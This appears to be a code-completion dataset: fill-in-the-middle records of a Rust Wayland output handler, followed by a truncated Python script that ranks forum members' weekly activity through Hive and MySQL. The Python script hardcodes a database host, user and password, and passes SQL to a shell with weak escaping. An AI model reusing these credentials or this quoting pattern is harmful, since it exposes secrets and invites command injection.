output.rs | //! Types and functions related to graphical outputs
//!
//! This modules provides two main elements. The first is the
//! [`OutputHandler`](struct.OutputHandler.html) type, which is a
//! [`MultiGlobalHandler`](../environment/trait.MultiGlobalHandler.html) for
//! use with the [`init_environment!`](../macro.init_environment.html) macro. It is automatically
//! included if you use the [`new_default_environment!`](../macro.new_default_environment.html).
//!
//! The second is the [`with_output_info`](fn.with_output_info.html) with allows you to
//! access the information associated to this output, as an [`OutputInfo`](struct.OutputInfo.html).
use std::{
cell::RefCell,
rc::{self, Rc},
sync::{self, Arc, Mutex},
};
use wayland_client::{
protocol::{
wl_output::{self, Event, WlOutput},
wl_registry,
},
Attached, DispatchData, Main,
};
pub use wayland_client::protocol::wl_output::{Subpixel, Transform};
/// A possible mode for an output
#[derive(Copy, Clone, Debug)]
pub struct Mode {
/// Number of pixels of this mode in format `(width, height)`
///
/// for example `(1920, 1080)`
pub dimensions: (i32, i32),
/// Refresh rate for this mode, in mHz
pub refresh_rate: i32,
/// Whether this is the current mode for this output
pub is_current: bool,
/// Whether this is the preferred mode for this output
pub is_preferred: bool,
}
#[derive(Clone, Debug)]
/// Compiled information about an output
pub struct OutputInfo {
/// The ID of this output as a global
pub id: u32,
/// The model name of this output as advertised by the server
pub model: String,
/// The make name of this output as advertised by the server
pub make: String,
/// Location of the top-left corner of this output in compositor
/// space
///
/// Note that the compositor may decide to always report (0,0) if
/// it decides clients are not allowed to know this information.
pub location: (i32, i32),
/// Physical dimensions of this output, in unspecified units
pub physical_size: (i32, i32),
/// The subpixel layout for this output
pub subpixel: Subpixel,
/// The current transformation applied to this output
///
/// You can pre-render your buffers taking this information
/// into account and advertising it via `wl_buffer.set_tranform`
/// for better performances.
pub transform: Transform,
/// The scaling factor of this output
///
/// Any buffer whose scaling factor does not match the one
/// of the output it is displayed on will be rescaled accordingly.
///
/// For example, a buffer of scaling factor 1 will be doubled in
/// size if the output scaling factor is 2.
pub scale_factor: i32,
/// Possible modes for an output
pub modes: Vec<Mode>,
/// Has this output been unadvertized by the registry
///
/// If this is the case, it has become inert, you might want to
/// call its `release()` method if you don't plan to use it any
/// longer.
pub obsolete: bool,
}
impl OutputInfo {
fn new(id: u32) -> OutputInfo {
OutputInfo {
id,
model: String::new(),
make: String::new(),
location: (0, 0),
physical_size: (0, 0),
subpixel: Subpixel::Unknown,
transform: Transform::Normal,
scale_factor: 1,
modes: Vec::new(),
obsolete: false,
}
}
}
type OutputCallback = dyn Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync;
enum OutputData {
Ready { info: OutputInfo, callbacks: Vec<sync::Weak<OutputCallback>> },
Pending { id: u32, events: Vec<Event>, callbacks: Vec<sync::Weak<OutputCallback>> },
}
type OutputStatusCallback = dyn FnMut(WlOutput, &OutputInfo, DispatchData) + 'static;
| /// included in [`new_default_environment!`](../macro.new_default_environment.html).
///
/// It aggregates the output information and makes it available via the
/// [`with_output_info`](fn.with_output_info.html) function.
pub struct OutputHandler {
outputs: Vec<(u32, Attached<WlOutput>)>,
status_listeners: Rc<RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>>,
}
impl OutputHandler {
/// Create a new instance of this handler
pub fn new() -> OutputHandler {
OutputHandler { outputs: Vec::new(), status_listeners: Rc::new(RefCell::new(Vec::new())) }
}
}
impl crate::environment::MultiGlobalHandler<WlOutput> for OutputHandler {
fn created(
&mut self,
registry: Attached<wl_registry::WlRegistry>,
id: u32,
version: u32,
_: DispatchData,
) {
// We currently support wl_output up to version 3
let version = std::cmp::min(version, 3);
let output = registry.bind::<WlOutput>(version, id);
if version > 1 {
// wl_output.done event was only added at version 2
// In case of an old version 1, we just behave as if it was send at the start
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Pending { id, events: vec![], callbacks: vec![] })
});
} else {
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Ready { info: OutputInfo::new(id), callbacks: vec![] })
});
}
let status_listeners_handle = self.status_listeners.clone();
output.quick_assign(move |output, event, ddata| {
process_output_event(output, event, ddata, &status_listeners_handle)
});
self.outputs.push((id, (*output).clone()));
}
fn removed(&mut self, id: u32, mut ddata: DispatchData) {
let status_listeners_handle = self.status_listeners.clone();
self.outputs.retain(|(i, o)| {
if *i != id {
true
} else {
make_obsolete(o, ddata.reborrow(), &status_listeners_handle);
false
}
});
}
fn get_all(&self) -> Vec<Attached<WlOutput>> {
self.outputs.iter().map(|(_, o)| o.clone()).collect()
}
}
fn process_output_event(
output: Main<WlOutput>,
event: Event,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
if let Event::Done = event {
let (id, pending_events, mut callbacks) =
if let OutputData::Pending { id, events: ref mut v, callbacks: ref mut cb } = *udata {
(id, std::mem::replace(v, vec![]), std::mem::replace(cb, vec![]))
} else {
// a Done event on an output that is already ready => nothing to do
return;
};
let mut info = OutputInfo::new(id);
for evt in pending_events {
merge_event(&mut info, evt);
}
notify(&output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
} else {
match *udata {
OutputData::Pending { events: ref mut v, .. } => v.push(event),
OutputData::Ready { ref mut info, ref mut callbacks } => {
merge_event(info, event);
notify(&output, info, ddata, callbacks);
}
}
}
}
fn make_obsolete(
output: &Attached<WlOutput>,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
let (id, mut callbacks) = match *udata {
OutputData::Ready { ref mut info, ref mut callbacks } => {
info.obsolete = true;
notify(output, info, ddata.reborrow(), callbacks);
notify_status_listeners(&output, info, ddata, listeners);
return;
}
OutputData::Pending { id, callbacks: ref mut cb, .. } => {
(id, std::mem::replace(cb, vec![]))
}
};
let mut info = OutputInfo::new(id);
info.obsolete = true;
notify(output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
}
fn merge_event(info: &mut OutputInfo, event: Event) {
match event {
Event::Geometry {
x,
y,
physical_width,
physical_height,
subpixel,
model,
make,
transform,
} => {
info.location = (x, y);
info.physical_size = (physical_width, physical_height);
info.subpixel = subpixel;
info.transform = transform;
info.model = model;
info.make = make;
}
Event::Scale { factor } => {
info.scale_factor = factor;
}
Event::Mode { width, height, refresh, flags } => {
let mut found = false;
if let Some(mode) = info
.modes
.iter_mut()
.find(|m| m.dimensions == (width, height) && m.refresh_rate == refresh)
{
// this mode already exists, update it
mode.is_preferred = flags.contains(wl_output::Mode::Preferred);
mode.is_current = flags.contains(wl_output::Mode::Current);
found = true;
}
if !found {
// otherwise, add it
info.modes.push(Mode {
dimensions: (width, height),
refresh_rate: refresh,
is_preferred: flags.contains(wl_output::Mode::Preferred),
is_current: flags.contains(wl_output::Mode::Current),
})
}
}
// ignore all other events
_ => (),
}
}
fn notify(
output: &WlOutput,
info: &OutputInfo,
mut ddata: DispatchData,
callbacks: &mut Vec<sync::Weak<OutputCallback>>,
) {
callbacks.retain(|weak| {
if let Some(arc) = sync::Weak::upgrade(weak) {
(*arc)(output.clone(), info, ddata.reborrow());
true
} else {
false
}
});
}
fn notify_status_listeners(
output: &Attached<WlOutput>,
info: &OutputInfo,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
// Notify the callbacks listening for new outputs
listeners.borrow_mut().retain(|lst| {
if let Some(cb) = rc::Weak::upgrade(lst) {
(&mut *cb.borrow_mut())(output.detach(), info, ddata.reborrow());
true
} else {
false
}
})
}
/// Access the info associated with this output
///
/// The provided closure is given the [`OutputInfo`](struct.OutputInfo.html) as argument,
/// and its return value is returned from this function.
///
/// If the provided `WlOutput` has not yet been initialized or is not managed by SCTK, `None` is returned.
///
/// If the output has been removed by the compositor, the `obsolete` field of the `OutputInfo`
/// will be set to `true`. This handler will not automatically detroy the output by calling its
/// `release` method, to avoid interfering with your logic.
pub fn with_output_info<T, F: FnOnce(&OutputInfo) -> T>(output: &WlOutput, f: F) -> Option<T> {
if let Some(ref udata_mutex) = output.as_ref().user_data().get::<Mutex<OutputData>>() {
let udata = udata_mutex.lock().unwrap();
match *udata {
OutputData::Ready { ref info, .. } => Some(f(info)),
OutputData::Pending { .. } => None,
}
} else {
None
}
}
/// Add a listener to this output
///
/// The provided closure will be called whenever a property of the output changes,
/// including when it is removed by the compositor (in this case it'll be marked as
/// obsolete).
///
/// The returned [`OutputListener`](struct.OutputListener) keeps your callback alive,
/// dropping it will disable the callback and free the closure.
pub fn add_output_listener<F: Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync + 'static>(
output: &WlOutput,
f: F,
) -> OutputListener {
let arc = Arc::new(f) as Arc<_>;
if let Some(udata_mutex) = output.as_ref().user_data().get::<Mutex<OutputData>>() {
let mut udata = udata_mutex.lock().unwrap();
match *udata {
OutputData::Pending { ref mut callbacks, .. } => {
callbacks.push(Arc::downgrade(&arc));
}
OutputData::Ready { ref mut callbacks, .. } => {
callbacks.push(Arc::downgrade(&arc));
}
}
}
OutputListener { _cb: arc }
}
/// A handle to an output listener callback
///
/// Dropping it disables the associated callback and frees the closure.
pub struct OutputListener {
_cb: Arc<dyn Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync + 'static>,
}
/// A handle to an output status callback
///
/// Dropping it disables the associated callback and frees the closure.
pub struct OutputStatusListener {
_cb: Rc<RefCell<OutputStatusCallback>>,
}
/// Trait representing the OutputHandler functions
///
/// Implementing this trait on your inner environment struct used with the
/// [`environment!`](../macro.environment.html) by delegating it to its
/// [`OutputHandler`](struct.OutputHandler.html) field will make available the output-associated
/// method on your [`Environment`](../environment/struct.Environment.html).
pub trait OutputHandling {
/// Insert a listener for output creation and removal events
fn listen<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&mut self,
f: F,
) -> OutputStatusListener;
}
impl OutputHandling for OutputHandler {
fn listen<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&mut self,
f: F,
) -> OutputStatusListener {
let rc = Rc::new(RefCell::new(f)) as Rc<_>;
self.status_listeners.borrow_mut().push(Rc::downgrade(&rc));
OutputStatusListener { _cb: rc }
}
}
impl<E: OutputHandling> crate::environment::Environment<E> {
/// Insert a new listener for outputs
///
/// The provided closure will be invoked whenever a `wl_output` is created or removed.
///
/// Note that if outputs already exist when this callback is setup, it'll not be invoked on them.
/// For you to be notified of them as well, you need to first process them manually by calling
/// `.get_all_outputs()`.
///
/// The returned [`OutputStatusListener`](../output/struct.OutputStatusListener.hmtl) keeps your
/// callback alive, dropping it will disable it.
#[must_use = "the returned OutputStatusListener keeps your callback alive, dropping it will disable it"]
pub fn listen_for_outputs<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&self,
f: F,
) -> OutputStatusListener {
self.with_inner(move |inner| OutputHandling::listen(inner, f))
}
}
impl<E: crate::environment::MultiGlobalHandler<WlOutput>> crate::environment::Environment<E> {
/// Shorthand method to retrieve the list of outputs
pub fn get_all_outputs(&self) -> Vec<WlOutput> {
self.get_all_globals::<WlOutput>().into_iter().map(|o| o.detach()).collect()
}
} | /// A handler for `wl_output`
///
/// This handler can be used for managing `wl_output` in the
/// [`init_environment!`](../macro.init_environment.html) macro, and is automatically | random_line_split |
output.rs | //! Types and functions related to graphical outputs
//!
//! This modules provides two main elements. The first is the
//! [`OutputHandler`](struct.OutputHandler.html) type, which is a
//! [`MultiGlobalHandler`](../environment/trait.MultiGlobalHandler.html) for
//! use with the [`init_environment!`](../macro.init_environment.html) macro. It is automatically
//! included if you use the [`new_default_environment!`](../macro.new_default_environment.html).
//!
//! The second is the [`with_output_info`](fn.with_output_info.html) with allows you to
//! access the information associated to this output, as an [`OutputInfo`](struct.OutputInfo.html).
use std::{
cell::RefCell,
rc::{self, Rc},
sync::{self, Arc, Mutex},
};
use wayland_client::{
protocol::{
wl_output::{self, Event, WlOutput},
wl_registry,
},
Attached, DispatchData, Main,
};
pub use wayland_client::protocol::wl_output::{Subpixel, Transform};
/// A possible mode for an output
#[derive(Copy, Clone, Debug)]
pub struct Mode {
/// Number of pixels of this mode in format `(width, height)`
///
/// for example `(1920, 1080)`
pub dimensions: (i32, i32),
/// Refresh rate for this mode, in mHz
pub refresh_rate: i32,
/// Whether this is the current mode for this output
pub is_current: bool,
/// Whether this is the preferred mode for this output
pub is_preferred: bool,
}
#[derive(Clone, Debug)]
/// Compiled information about an output
pub struct OutputInfo {
/// The ID of this output as a global
pub id: u32,
/// The model name of this output as advertised by the server
pub model: String,
/// The make name of this output as advertised by the server
pub make: String,
/// Location of the top-left corner of this output in compositor
/// space
///
/// Note that the compositor may decide to always report (0,0) if
/// it decides clients are not allowed to know this information.
pub location: (i32, i32),
/// Physical dimensions of this output, in unspecified units
pub physical_size: (i32, i32),
/// The subpixel layout for this output
pub subpixel: Subpixel,
/// The current transformation applied to this output
///
/// You can pre-render your buffers taking this information
/// into account and advertising it via `wl_buffer.set_tranform`
/// for better performances.
pub transform: Transform,
/// The scaling factor of this output
///
/// Any buffer whose scaling factor does not match the one
/// of the output it is displayed on will be rescaled accordingly.
///
/// For example, a buffer of scaling factor 1 will be doubled in
/// size if the output scaling factor is 2.
pub scale_factor: i32,
/// Possible modes for an output
pub modes: Vec<Mode>,
/// Has this output been unadvertized by the registry
///
/// If this is the case, it has become inert, you might want to
/// call its `release()` method if you don't plan to use it any
/// longer.
pub obsolete: bool,
}
impl OutputInfo {
fn new(id: u32) -> OutputInfo {
OutputInfo {
id,
model: String::new(),
make: String::new(),
location: (0, 0),
physical_size: (0, 0),
subpixel: Subpixel::Unknown,
transform: Transform::Normal,
scale_factor: 1,
modes: Vec::new(),
obsolete: false,
}
}
}
type OutputCallback = dyn Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync;
enum OutputData {
Ready { info: OutputInfo, callbacks: Vec<sync::Weak<OutputCallback>> },
Pending { id: u32, events: Vec<Event>, callbacks: Vec<sync::Weak<OutputCallback>> },
}
type OutputStatusCallback = dyn FnMut(WlOutput, &OutputInfo, DispatchData) + 'static;
/// A handler for `wl_output`
///
/// This handler can be used for managing `wl_output` in the
/// [`init_environment!`](../macro.init_environment.html) macro, and is automatically
/// included in [`new_default_environment!`](../macro.new_default_environment.html).
///
/// It aggregates the output information and makes it available via the
/// [`with_output_info`](fn.with_output_info.html) function.
pub struct OutputHandler {
outputs: Vec<(u32, Attached<WlOutput>)>,
status_listeners: Rc<RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>>,
}
impl OutputHandler {
/// Create a new instance of this handler
pub fn new() -> OutputHandler {
OutputHandler { outputs: Vec::new(), status_listeners: Rc::new(RefCell::new(Vec::new())) }
}
}
impl crate::environment::MultiGlobalHandler<WlOutput> for OutputHandler {
fn created(
&mut self,
registry: Attached<wl_registry::WlRegistry>,
id: u32,
version: u32,
_: DispatchData,
) {
// We currently support wl_output up to version 3
let version = std::cmp::min(version, 3);
let output = registry.bind::<WlOutput>(version, id);
if version > 1 {
// wl_output.done event was only added at version 2
// In case of an old version 1, we just behave as if it was send at the start
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Pending { id, events: vec![], callbacks: vec![] })
});
} else {
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Ready { info: OutputInfo::new(id), callbacks: vec![] })
});
}
let status_listeners_handle = self.status_listeners.clone();
output.quick_assign(move |output, event, ddata| {
process_output_event(output, event, ddata, &status_listeners_handle)
});
self.outputs.push((id, (*output).clone()));
}
fn removed(&mut self, id: u32, mut ddata: DispatchData) {
let status_listeners_handle = self.status_listeners.clone();
self.outputs.retain(|(i, o)| {
if *i != id {
true
} else {
make_obsolete(o, ddata.reborrow(), &status_listeners_handle);
false
}
});
}
fn get_all(&self) -> Vec<Attached<WlOutput>> {
self.outputs.iter().map(|(_, o)| o.clone()).collect()
}
}
fn process_output_event(
output: Main<WlOutput>,
event: Event,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
if let Event::Done = event {
let (id, pending_events, mut callbacks) =
if let OutputData::Pending { id, events: ref mut v, callbacks: ref mut cb } = *udata {
(id, std::mem::replace(v, vec![]), std::mem::replace(cb, vec![]))
} else {
// a Done event on an output that is already ready => nothing to do
return;
};
let mut info = OutputInfo::new(id);
for evt in pending_events {
merge_event(&mut info, evt);
}
notify(&output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
} else {
match *udata {
OutputData::Pending { events: ref mut v, .. } => v.push(event),
OutputData::Ready { ref mut info, ref mut callbacks } => {
merge_event(info, event);
notify(&output, info, ddata, callbacks);
}
}
}
}
fn make_obsolete(
output: &Attached<WlOutput>,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
let (id, mut callbacks) = match *udata {
OutputData::Ready { ref mut info, ref mut callbacks } => {
info.obsolete = true;
notify(output, info, ddata.reborrow(), callbacks);
notify_status_listeners(&output, info, ddata, listeners);
return;
}
OutputData::Pending { id, callbacks: ref mut cb, .. } => {
(id, std::mem::replace(cb, vec![]))
}
};
let mut info = OutputInfo::new(id);
info.obsolete = true;
notify(output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
}
fn merge_event(info: &mut OutputInfo, event: Event) {
match event {
Event::Geometry {
x,
y,
physical_width,
physical_height,
subpixel,
model,
make,
transform,
} => {
info.location = (x, y);
info.physical_size = (physical_width, physical_height);
info.subpixel = subpixel;
info.transform = transform;
info.model = model;
info.make = make;
}
Event::Scale { factor } => {
info.scale_factor = factor;
}
Event::Mode { width, height, refresh, flags } => {
let mut found = false;
if let Some(mode) = info
.modes
.iter_mut()
.find(|m| m.dimensions == (width, height) && m.refresh_rate == refresh)
{
// this mode already exists, update it
mode.is_preferred = flags.contains(wl_output::Mode::Preferred);
mode.is_current = flags.contains(wl_output::Mode::Current);
found = true;
}
if !found {
// otherwise, add it
info.modes.push(Mode {
dimensions: (width, height),
refresh_rate: refresh,
is_preferred: flags.contains(wl_output::Mode::Preferred),
is_current: flags.contains(wl_output::Mode::Current),
})
}
}
// ignore all other events
_ => (),
}
}
fn notify(
output: &WlOutput,
info: &OutputInfo,
mut ddata: DispatchData,
callbacks: &mut Vec<sync::Weak<OutputCallback>>,
) {
callbacks.retain(|weak| {
if let Some(arc) = sync::Weak::upgrade(weak) {
(*arc)(output.clone(), info, ddata.reborrow());
true
} else |
});
}
fn notify_status_listeners(
output: &Attached<WlOutput>,
info: &OutputInfo,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
// Notify the callbacks listening for new outputs
listeners.borrow_mut().retain(|lst| {
if let Some(cb) = rc::Weak::upgrade(lst) {
(&mut *cb.borrow_mut())(output.detach(), info, ddata.reborrow());
true
} else {
false
}
})
}
/// Access the info associated with this output
///
/// The provided closure is given the [`OutputInfo`](struct.OutputInfo.html) as argument,
/// and its return value is returned from this function.
///
/// If the provided `WlOutput` has not yet been initialized or is not managed by SCTK, `None` is returned.
///
/// If the output has been removed by the compositor, the `obsolete` field of the `OutputInfo`
/// will be set to `true`. This handler will not automatically detroy the output by calling its
/// `release` method, to avoid interfering with your logic.
pub fn with_output_info<T, F: FnOnce(&OutputInfo) -> T>(output: &WlOutput, f: F) -> Option<T> {
if let Some(ref udata_mutex) = output.as_ref().user_data().get::<Mutex<OutputData>>() {
let udata = udata_mutex.lock().unwrap();
match *udata {
OutputData::Ready { ref info, .. } => Some(f(info)),
OutputData::Pending { .. } => None,
}
} else {
None
}
}
/// Add a listener to this output
///
/// The provided closure will be called whenever a property of the output changes,
/// including when it is removed by the compositor (in this case it'll be marked as
/// obsolete).
///
/// The returned [`OutputListener`](struct.OutputListener) keeps your callback alive,
/// dropping it will disable the callback and free the closure.
pub fn add_output_listener<F: Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync + 'static>(
output: &WlOutput,
f: F,
) -> OutputListener {
let arc = Arc::new(f) as Arc<_>;
if let Some(udata_mutex) = output.as_ref().user_data().get::<Mutex<OutputData>>() {
let mut udata = udata_mutex.lock().unwrap();
match *udata {
OutputData::Pending { ref mut callbacks, .. } => {
callbacks.push(Arc::downgrade(&arc));
}
OutputData::Ready { ref mut callbacks, .. } => {
callbacks.push(Arc::downgrade(&arc));
}
}
}
OutputListener { _cb: arc }
}
/// A handle to an output listener callback
///
/// Dropping it disables the associated callback and frees the closure.
pub struct OutputListener {
_cb: Arc<dyn Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync + 'static>,
}
/// A handle to an output status callback
///
/// Dropping it disables the associated callback and frees the closure.
pub struct OutputStatusListener {
_cb: Rc<RefCell<OutputStatusCallback>>,
}
/// Trait representing the OutputHandler functions
///
/// Implementing this trait on your inner environment struct used with the
/// [`environment!`](../macro.environment.html) by delegating it to its
/// [`OutputHandler`](struct.OutputHandler.html) field will make available the output-associated
/// method on your [`Environment`](../environment/struct.Environment.html).
pub trait OutputHandling {
/// Insert a listener for output creation and removal events
fn listen<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&mut self,
f: F,
) -> OutputStatusListener;
}
impl OutputHandling for OutputHandler {
fn listen<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&mut self,
f: F,
) -> OutputStatusListener {
let rc = Rc::new(RefCell::new(f)) as Rc<_>;
self.status_listeners.borrow_mut().push(Rc::downgrade(&rc));
OutputStatusListener { _cb: rc }
}
}
impl<E: OutputHandling> crate::environment::Environment<E> {
/// Insert a new listener for outputs
///
/// The provided closure will be invoked whenever a `wl_output` is created or removed.
///
/// Note that if outputs already exist when this callback is setup, it'll not be invoked on them.
/// For you to be notified of them as well, you need to first process them manually by calling
/// `.get_all_outputs()`.
///
/// The returned [`OutputStatusListener`](../output/struct.OutputStatusListener.hmtl) keeps your
/// callback alive, dropping it will disable it.
#[must_use = "the returned OutputStatusListener keeps your callback alive, dropping it will disable it"]
pub fn listen_for_outputs<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&self,
f: F,
) -> OutputStatusListener {
self.with_inner(move |inner| OutputHandling::listen(inner, f))
}
}
impl<E: crate::environment::MultiGlobalHandler<WlOutput>> crate::environment::Environment<E> {
/// Shorthand method to retrieve the list of outputs
pub fn get_all_outputs(&self) -> Vec<WlOutput> {
self.get_all_globals::<WlOutput>().into_iter().map(|o| o.detach()).collect()
}
}
| {
false
} | conditional_block |
memberweekactrank.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os, datetime, time
import logging
from optparse import OptionParser
import string, codecs
import subprocess
import MySQLdb
import json, phpserialize
import httplib, urllib, socket
from urlparse import urlparse
import re
def mklogfile(s):
if not os.path.exists(s):
f=open(s,'w')
f.write('.log\n')
f.close()
os.chmod(s, 0666)
def isdate(s):
try:
time.strptime(str(s).replace('-',''),'%Y%m%d')
return True
except:
return False
def isnum(s):
ret = re.match(r'[+-]?\d*[\.]?\d*$', s)
return True if ret!=None else False
def getweekfirstday(dt):
try:
return dt + datetime.timedelta(days=1-dt.isoweekday())
except:
return None
def getweeklastday(dt):
try:
return dt + datetime.timedelta(days=7-dt.isoweekday())
except:
return None
def isweekend(s):
try:
return datetime.datetime.strptime(s,'%Y%m%d').isoweekday() == 7
except:
return False
def ismonthend(s):
try:
return (datetime.datetime.strptime(s,'%Y%m%d') + datetime.timedelta(days=1)).day == 1
except:
return False
def delbom(s):
if s[0]==codecs.BOM_UTF8:
return s[1:]
else:
return s
def delctrlchr(s, cc = '\n\t\r'):
return str(s).translate(string.maketrans(cc,' '*len(cc)))
def sqlEscape(s):
try:
ret = str(s).replace('\\','\\\\')
ret = ret.replace('`','\\`')
return ret
except:
return None
def | (s):
logger.debug("sql# %s" % s)
cmd = 'hive -S -e "%(sql)s"' % {'sql':sqlEscape(s)}
proc = subprocess.Popen(cmd, shell=True, env=os.environ, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
hiveout, errmsg = proc.communicate()
retval = proc.wait()
if retval!=0:
logger.error("HiveError!!!(%d)" % retval)
logger.error("Debug Info: %s" % str(errmsg))
sys.exit(retval)
return hiveout
def getscore(t):
return int(t.get('topicnum',0)*WEIGHTS[c_topicnum][c_default] + \
t.get('commentnum',0)*WEIGHTS[c_commentnum][c_default] + \
t.get('startopicnum',0)*WEIGHTS[c_startopicnum][c_default] + \
t.get('isnewuser',0)*WEIGHTS[c_isnewuser][c_default]
)
reload(sys)
sys.setdefaultencoding('utf8')
retval = 0
##运行时变量
pid = os.getpid()
rundate = datetime.date.today().strftime("%Y%m%d")
rundir = os.path.dirname(os.path.abspath(__file__))
runfilename = os.path.splitext(os.path.split(os.path.abspath(__file__))[1])[0]
logdir = rundir + '/log'
tmpdir = rundir + '/tmp'
if not os.path.exists(logdir):
os.mkdir(logdir,0777)
if not os.path.exists(tmpdir):
os.mkdir(tmpdir,0777)
logfile = '%(dir)s%(sep)s%(filename)s.log' % {'dir':logdir,'sep':os.sep,'filename':runfilename,'rundate':rundate,'pid':pid}
if not os.path.exists(logfile):
mklogfile(logfile)
##日志器
logger = logging.getLogger('task')
logger.setLevel(logging.DEBUG)
fileHandler = logging.FileHandler(logfile)
fileHandler.setLevel(logging.INFO)
fileHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(levelname)s - %(message)s"))
logger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setLevel(logging.INFO)
consoleHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(filename)s\n%(message)s"))
logger.addHandler(consoleHandler)
logger.info("begin execute... %s" % str(sys.argv))
##参数解析
usageinfo = "%prog [--date=statisdate] [--post] [-v]"
parser = OptionParser(usage=usageinfo, version="%prog v0.1.0")
parser.set_defaults(statisdate=(datetime.datetime.strptime(rundate,'%Y%m%d')+datetime.timedelta(days=-1)).strftime('%Y%m%d'))
parser.add_option('-d', '--date', dest='statisdate', help='statis date, yyyy-mm-dd or yyyymmdd', metavar='DATE')
parser.add_option('-p', '--post', action='store_true', dest='postmode', default=False, help='post mode', metavar='MODE')
parser.add_option('-v', '--verbose', action='store_true', dest='verbosemode', default=False, help='verbose mode', metavar='MODE')
(options, args) = parser.parse_args()
statisdate = options.statisdate.replace('-','')
postmode = options.postmode
verbosemode = options.verbosemode
#参数检查
if verbosemode:
consoleHandler.setLevel(logging.DEBUG)
if not isdate(statisdate):
logger.error("unconverted date %s" % statisdate)
sys.exit(-101)
#日期变量
dt_statisdate = datetime.datetime.strptime(statisdate,'%Y%m%d')
statis_date = dt_statisdate.strftime('%Y-%m-%d')
statis_week = getweekfirstday(dt_statisdate).strftime('%Y-%W')
statisweek_firstday = getweekfirstday(dt_statisdate).strftime('%Y-%m-%d')
statisweek_lastday = getweeklastday(dt_statisdate).strftime('%Y-%m-%d')
preday90_date = (dt_statisdate+datetime.timedelta(days=-90)).strftime("%Y-%m-%d")
#指标权重系数配置
c_topicnum, c_commentnum, c_startopicnum, c_isnewuser = range(4)
INDEX_FACTOR = [2.0, 1.0, 0.5, 50.0]
c_default, c_app, c_web = range(3)
SOURCE_FACTOR = [1.0, 1.2, 0.8]
WEIGHTS = []
for index in INDEX_FACTOR:
row = []
for source in SOURCE_FACTOR:
row.append(index*source)
WEIGHTS.append(row)
resultset = {}
#数据来源
logger.debug("connecting mysql ...")
dbconn = MySQLdb.connect(host='10.0.10.85',user='bi',passwd='bi_haodou',port=3306,charset='utf8')
sqlcursor = dbconn.cursor()
#获取小组管理员。小组管理员不纳入小组成员排名
sqlstmt = r"""
select GroupAdmins as admin1, ManageMaster as admin2, ManageSlave as admin3
from haodou_center.GroupCate
where parentid!=0
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
ignoreusers = []
for (admin1, admin2, admin3) in dataset:
if admin1 is not None:
admin = phpserialize.loads(admin1.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin2 is not None:
admin = phpserialize.loads(admin2.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin3 is not None:
admin = phpserialize.loads(admin3.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
logger.debug("ignoreusers: %s" % ignoreusers)
#获取新用户。3个月内注册
sqlstmt = r"""
select userid
from haodou_passport.User
where status=1 and regtime>'%(preday90_date)s 00:00:00'
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
